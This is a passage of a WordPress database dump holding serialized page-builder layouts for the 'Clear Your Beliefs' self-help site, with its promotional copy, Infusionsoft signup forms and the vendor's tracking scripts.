Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1290, 1750, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:3443:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">\n<form class="infusion-form" onsubmit="var form = document.forms[0]; var resolution = document.createElement(''input''); resolution.setAttribute(''id'', ''screenResolution''); resolution.setAttribute(''type'', ''hidden''); resolution.setAttribute(''name'', ''screenResolution''); var resolutionString = screen.width + ''x'' + screen.height; resolution.setAttribute(''value'', resolutionString); form.appendChild(resolution); var pluginString = ''''; if (window.ActiveXObject) { var activeXNames = {''AcroPDF.PDF'':''Adobe Reader'', ''ShockwaveFlash.ShockwaveFlash...ent(''input''); plugins.setAttribute(''id'', ''pluginList''); plugins.setAttribute(''type'', ''hidden''); plugins.setAttribute(''name'', ''pluginList''); plugins.setAttribute(''value'', pluginString); form.appendChild(plugins); var java = navigator.javaEnabled(); var javaEnabled = document.createElement(''input''); javaEnabled.setAttribute(''id'', ''javaEnabled''); javaEnabled.setAttribute(''type'', ''hidden''); javaEnabled.setAttribute(''name'', ''javaEnabled''); javaEnabled.setAttribute(''value'', java); form.appendChild(javaEnabled);" name="Click Download iphone APP" method="POST" ?referrer="http%3A%2F%2Fclearyourbeliefs.com%2F"" target="_top" action="https://beliefcloset.infusionsoft.com/app/form/redirectProcess/95b50364c9028abe58d1cf438ba1ed6c?referrer=http%3A%2F%2Fclearyourbeliefs.com%2F" accept-charset="UTF-8">\n<input type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" name="inf_form_xid">\n<input type="hidden" value="Click Download iphone APP" name="inf_form_name">\n<input type="hidden" value="1.35.0.43" name="infusionsoft_version">\n<div id="mainContent" class="custom-10 beta-base beta-font-b" style="height:100%">\n<table class="background" cellspacing="0" cellpadding="10" style="width: 100%; height: 100%">\n<tbody>\n<tr>\n<td align="center" valign="top">\n<table class="bodyContainer webFormBodyContainer" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF" width="100%">\n<tbody>\n<tr>\n<td class="body" bgcolor="#FFFFFF" valign="top" sectionid="body">\n<div id="webformErrors" class="text" name="errorContent"> </div>\n<div>\n<div class="infusion-submit" style="text-align:center;">\n<button value="DOWNLOAD iPHONE APP" type="submit" style="width:215px; height:41px; background-color:#22359C; color:#FFFFFF; font-size:16px; font-family:Helvetica; border-color:#000000; border-style:Hidden; border-width:1px; -moz-border-radius:10px;border-radius:10px;">DOWNLOAD iPHONE APP</button>\n</div>\n</div>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</div>\n<input class="inf_2c3164869728d4937a87d37bac667146" type="text" name="inf_87AHWPRaF2E1G4qb">\n</form>\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1292, 1752, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1947:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" class="infusion-form nd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click &#a;Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n         <input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" class="infusion-form nd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click &#a;Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n        <input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" />\n</div>\n</form>\n\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1106:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form" method="POST">\n    <input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" />\n    <input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" />\n    <input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n    <div class="infusion-submit">\n        <input type="submit" value="LEARN MORE" />\n    </div>\n</form>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1293, 1753, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1947:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" class="infusion-form nd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click &#a;Download 